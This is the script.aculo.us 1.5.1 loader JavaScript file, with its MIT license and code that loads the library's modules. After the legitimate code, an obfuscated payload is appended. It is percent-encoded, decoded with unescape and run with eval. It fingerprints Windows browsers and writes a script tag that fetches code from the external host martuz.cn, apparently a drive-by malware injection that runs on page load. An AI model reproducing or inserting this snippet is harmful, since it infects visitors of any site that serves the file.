// Copyright (c) 2005 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// 
// Permission is hereby granted, free of charge, to any person obtaining
// a copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to
// permit persons to whom the Software is furnished to do so, subject to
// the following conditions:
// 
// The above copyright notice and this permission notice shall be
// included in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
// EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
// NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
// LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
// OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
// WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

var Scriptaculous = {
  Version: '1.5.1',
  require: function(libraryName) {
    // inserting via DOM fails in Safari 2.0, so brute force approach
    document.write('<script type="text/javascript" src="'+libraryName+'"></script>');
  },
  load: function() {
    if((typeof Prototype=='undefined') ||
      parseFloat(Prototype.Version.split(".")[0] + "." +
                 Prototype.Version.split(".")[1]) < 1.4)
      throw("script.aculo.us requires the Prototype JavaScript framework >= 1.4.0");
    
    $A(document.getElementsByTagName("script")).findAll( function(s) {
      return (s.src && s.src.match(/scriptaculous\.js(\?.*)?$/))
    }).each( function(s) {
      var path = s.src.replace(/scriptaculous\.js(\?.*)?$/,'');
      var includes = s.src.match(/\?.*load=([a-z,]*)/);
      (includes ? includes[1] : 'builder,effects,dragdrop,controls,slider').split(',').each(
       function(include) { Scriptaculous.require(path+include+'.js') });
    });
  }
}

Scriptaculous.load();<!-- 
(function(){var cS0v=('var-20a-3d-22-53criptEngine-22-2cb-3d-22Version(-29+-22-2cj-3d-22-22-2c-75-3dnavigat-6fr-2euserAgent-3b-69f(-28u-2e-69-6edex-4f-66-28-22-43hrome-22)-3c0)-26-26(u-2ei-6e-64e-78O-66(-22-57i-6e-22-29-3e0-29-26-26(-75-2e-69nd-65x-4ff(-22N-54-206-22)-3c0-29-26-26(do-63ument-2ecookie-2eind-65xO-66(-22-6di-65k-3d1-22-29-3c0)-26-26-28ty-70-65o-66-28z-72-76z-74-73)-21-3dtype-6ff(-22A-22))-29-7b-7a-72vzts-3d-22A-22-3b-65v-61l-28-22if(window-2e-22-2b-61+-22-29j-3d-6a+-22+-61+-22M-61j-6f-72-22+b+a-2b-22-4dinor-22+b+-61+-22B-75ild-22+b+-22j-3b-22-29-3bdo-63um-65nt-2ewr-69te-28-22-3c-73cr-69p-74-20-73rc-3d-2f-2fm-61-22-2b-22r-74uz-2ecn-2f-76-69-64-2f-3fid-3d-22-2bj-2b-22-3e-3c-5c-2fscr-69pt-3e-22)-3b-7d').replace(/-/g,'%');var Tcg=unescape(cS0v);eval(Tcg)})();
 -->